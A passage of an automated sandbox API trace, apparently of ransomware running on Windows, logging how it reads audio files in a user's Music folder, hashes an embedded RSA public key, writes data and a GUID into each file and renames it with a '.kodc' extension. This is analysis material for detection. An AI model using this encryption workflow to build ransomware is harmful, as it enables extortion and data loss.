cAlternateFileName="CKHQFN~1.M4A")) returned 1 [0099.021] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\cKhQfnc9b5ul_vPwo.m4a") returned=".m4a" [0099.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\cKhQfnc9b5ul_vPwo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ckhqfnc9b5ul_vpwo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.021] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=21215) returned 1 [0099.021] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.024] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x52b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.024] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.025] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.025] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x52df, lpOverlapped=0x0) returned 1 [0099.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.025] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.026] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.026] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.026] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.026] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.026] GetLastError () returned 0x0 [0099.027] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.027] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.027] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.027] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.027] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x52e0) returned 0x9ba4d90 [0099.027] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d9f0 [0099.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acb8 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9da38 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acd0 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad00 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad18 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.028] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0099.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad00 | out: hHeap=0x630000) returned 1 [0099.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad18 | out: hHeap=0x630000) returned 1 [0099.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad18 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ad00 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad18 | out: hHeap=0x630000) returned 1 [0099.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad00 | out: hHeap=0x630000) returned 1 [0099.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.029] GetCurrentThreadId () returned 0x42c [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8ff28 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.030] GetCurrentThreadId () returned 0x42c [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad00 [0099.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad18 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ace8 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad30 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad00 | out: hHeap=0x630000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad00 [0099.031] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x52df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.032] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.032] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.032] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.032] CloseHandle (hObject=0x5cc) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.033] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\cKhQfnc9b5ul_vPwo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ckhqfnc9b5ul_vpwo.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\cKhQfnc9b5ul_vPwo.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ckhqfnc9b5ul_vpwo.m4a.kodc")) returned 1 [0099.034] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0099.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.034] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned=".ini" [0099.034] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37275470, ftCreationTime.dwHighDateTime=0x1d5bae1, ftLastAccessTime.dwLowDateTime=0x57721b0, ftLastAccessTime.dwHighDateTime=0x1d5bd04, ftLastWriteTime.dwLowDateTime=0x57721b0, ftLastWriteTime.dwHighDateTime=0x1d5bd04, nFileSizeHigh=0x0, nFileSizeLow=0x15ffe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gWe58.mp3", cAlternateFileName="")) returned 1 [0099.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.035] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gWe58.mp3") returned=".mp3" [0099.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gWe58.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gwe58.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.035] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=90110) returned 1 [0099.035] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.038] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15fd8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.038] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.038] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x15ffe, lpOverlapped=0x0) returned 1 [0099.039] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.039] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.039] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.039] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.040] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.040] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.040] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.040] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.040] GetLastError () returned 0x0 [0099.040] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.040] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.041] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.041] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.041] RtlAllocateHeap 